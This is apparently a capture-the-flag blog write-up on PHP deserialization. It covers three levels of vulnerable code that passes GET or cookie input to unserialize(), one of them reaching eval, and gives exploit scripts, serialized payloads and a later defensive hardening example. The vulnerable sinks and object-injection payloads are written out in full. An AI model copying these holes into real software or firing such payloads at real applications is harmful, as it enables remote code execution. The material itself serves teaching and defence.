PHP Code Audit: Deserialization Vulnerabilities
Last updated on July 8, 2025 pm
All flags are stored in the $flag variable in flag.php.
level 1
```php
<?php
highlight_file(__FILE__);
class a {
    var $act;
    function action() {
        eval($this->act);
    }
}
// user-controlled input goes straight into unserialize()
$a = unserialize($_GET['flag']);
$a->action();
?>
```
eval is a code-execution function: it runs a string as PHP code. Since the flag is known to be in flag.php, first include flag.php, then output the $flag variable.
exp:
```php
<?php
highlight_file(__FILE__);
class a {
    var $act;
    function action() {
        eval($this->act);
    }
}
$test = new a;
$test->act = 'include("flag.php");echo $flag;';
echo serialize($test);
```
Generated payload:
O:1:"a":1:{s:3:"act";s:31:"include("flag.php");echo $flag;";}
level 2
```php
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin {
    var $user;
    var $pass;
    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
    function login() {
        if ($this->user == "daydream" and $this->pass == "ok") {
            return 1;
        }
    }
}
$a = unserialize($_GET['param']);
if ($a->login()) {
    echo $flag;
}
?>
```
The login method checks the values of user and pass; if it returns true, $flag is output.
__construct is the constructor (initialization) method.
exp:
```php
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin {
    var $user;
    var $pass;
    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
    function login() {
        if ($this->user == "daydream" and $this->pass == "ok") {
            return 1;
        }
    }
}
$test = new mylogin("daydream", "ok");
echo serialize($test);
?>
```
payload:
O:7:"mylogin":2:{s:4:"user";s:8:"daydream";s:4:"pass";s:2:"ok";}
level 3
```php
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin {
    var $user;
    var $pass;
    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
    function login() {
        if ($this->user == "daydream" and $this->pass == "ok") {
            return 1;
        }
    }
}
// same sink as level 2, but the input now arrives in a cookie
$a = unserialize($_COOKIE['param']);
if ($a->login()) {
    echo $flag;
}
?>
```
Similar to level 2. Note the superglobal $_COOKIE: the payload is passed in through a cookie, and it also needs to be URL-encoded.
payload:
O%3a7%3a%22mylogin%22%3a2%3a%7bs%3a4%3a%22user%22%3bs%3a8%3a%22daydream%22%3bs%3a4%3a%22pass%22%3bs%3a2%3a%22ok%22%3b%7d
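All three levels share the same sink: a serialized string from $_GET or $_COOKIE is handed to unserialize(), which instantiates whatever class the input names. The following is an added defensive example, not code from the original post: it assumes PHP >= 7.0 for the allowed_classes option, and the signing key, function names and sample inputs are constructed for the demo.

```php
<?php
// Added defensive example (not from the original post). It hardens the
// unserialize($_GET[...]) / unserialize($_COOKIE[...]) sink seen in the
// levels above. Assumes PHP >= 7.0 (allowed_classes option).

// 1) Never instantiate attacker-chosen classes. With allowed_classes => false
// every O:... entry becomes __PHP_Incomplete_Class, so no method of a real
// class (action(), login(), or any magic method) can be reached.
function unserialize_data_only(string $input)
{
    $value = @unserialize($input, ['allowed_classes' => false]);
    if ($value === false || $value instanceof __PHP_Incomplete_Class) {
        return null; // malformed input or an object payload: reject it
    }
    return $value; // scalars and arrays only
}

// 2) Only accept blobs the server itself produced: HMAC-sign on the way out,
// verify with a constant-time compare before unserialize() on the way in.
// Constructed demo key; a real key belongs in server-side config, not code.
const SIGNING_KEY = 'constructed-demo-key-change-me';

function sign_state(array $state): string
{
    $blob = serialize($state);
    return hash_hmac('sha256', $blob, SIGNING_KEY) . '.' . base64_encode($blob);
}

function load_state(string $token)
{
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) {
        return null;
    }
    list($mac, $b64) = $parts;
    $blob = base64_decode($b64, true);
    if ($blob === false || !hash_equals(hash_hmac('sha256', $blob, SIGNING_KEY), $mac)) {
        return null; // forged, tampered, or truncated token
    }
    return unserialize_data_only($blob);
}

// Constructed inputs: the level 1 payload from the post, a token with a bogus
// signature, and a token minted by the server itself.
$attack = 'O:1:"a":1:{s:3:"act";s:31:"include("flag.php");echo $flag;";}';
var_dump(unserialize_data_only($attack));                 // object payload from the post
var_dump(load_state('0000.' . base64_encode($attack)));   // forged signature
var_dump(load_state(sign_state(['user' => 'daydream']))); // legitimate server token
```

Where the application does not actually need object graphs, json_decode() is the simpler replacement, since JSON cannot name a PHP class at all.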
To be continued...
https://blog.lixey.top/posts/bcdf8f30/